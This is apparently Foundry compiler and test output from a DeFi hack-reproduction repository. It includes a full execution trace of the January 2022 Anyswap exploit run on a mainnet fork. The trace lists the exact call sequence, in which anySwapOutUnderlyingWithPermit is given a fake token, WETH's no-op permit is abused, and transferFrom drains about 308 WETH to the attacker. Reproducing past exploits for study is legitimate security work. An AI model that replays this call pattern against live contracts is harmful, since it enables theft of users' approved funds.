Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 898.33ms
Solc 0.8.10 finished in 1.10s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-01/Anyswap_exp.sol:48:5:
   |
48 |     function burn(address from, uint256 amount) external returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-01/Anyswap_exp.sol:54:5:
   |
54 |     function depositVault(uint256 amount, address to) external returns (uint256) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.12s (1.48ms CPU time)

Ran 1 test for src/test/2022-01/Anyswap_exp.sol:ContractTest
[PASS] testExample() (gas: 88117)
Logs:
  Before exploit, WETH balance of attacker:: 0
  After exploit, WETH balance of attacker:: 308636644758370382901

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14037236 [1.403e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [92917] ContractTest::testExample()
    ├─ [50453] 0x6b7a87899490EcE95443e979cA9485CBE7E71522::anySwapOutUnderlyingWithPermit(0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 308636644758370382903 [3.086e20], 100000000000000000000 [1e20], 0, 0x3078000000000000000000000000000000000000000000000000000000000000, 0x3078000000000000000000000000000000000000000000000000000000000000, 56)
    │   ├─ [2661] ContractTest::underlying() [staticcall]
    │   │   └─ ← [Return] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
    │   ├─ [4096] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::permit(0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB, 0x6b7a87899490EcE95443e979cA9485CBE7E71522, 308636644758370382903 [3.086e20], 100000000000000000000 [1e20], 0, 0x3078000000000000000000000000000000000000000000000000000000000000, 0x3078000000000000000000000000000000000000000000000000000000000000)
    │   │   ├─ emit Deposit(dst: 0x6b7a87899490EcE95443e979cA9485CBE7E71522, wad: 0)
    │   │   └─ ← [Stop]
    │   ├─ [32125] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 308636644758370382903 [3.086e20])
    │   │   ├─ emit Transfer(from: 0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 308636644758370382903 [3.086e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000010bb31a12e4317f437
    │   │   │   @ 0x7e747fd430ac81663592b4c1b161a0cef7065f22548fa3b1d7804f4641a68219: 0x000000000000000000000000000000000000000000000010bb31a12e4317f437 → 0
    │   │   └─ ← [Return] true
    │   ├─ [890] ContractTest::depositVault(308636644758370382903 [3.086e20], 0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB)
    │   │   └─ ← [Return] 1
    │   ├─ [897] ContractTest::burn(0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB, 308636644758370382903 [3.086e20])
    │   │   └─ ← [Return] true
    │   ├─ emit LogAnySwapOut(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB, param2: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], param3: 308636644758370382903 [3.086e20], param4: 1, param5: 56)
    │   └─ ← [Stop]
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Before exploit, WETH balance of attacker:", val: 0)
    ├─ [23162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 308636644758370382901 [3.086e20])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 308636644758370382901 [3.086e20])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000010bb31a12e4317f437 → 2
    │   │   @ 0x0a94e286e9304854df5b3f17b7089cd30cba9c4e94387f348447ad723c407a44: 0 → 0x000000000000000000000000000000000000000000000010bb31a12e4317f435
    │   └─ ← [Return] true
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 308636644758370382901 [3.086e20]
    ├─ emit log_named_uint(key: "After exploit, WETH balance of attacker:", val: 308636644758370382901 [3.086e20])
    ├─  storage changes:
    │   @ 0x0a94e286e9304854df5b3f17b7089cd30cba9c4e94387f348447ad723c407a44: 0 → 0x000000000000000000000000000000000000000000000010bb31a12e4317f435
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.21s (2.27s CPU time)

Ran 2 test suites in 4.21s (5.33s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
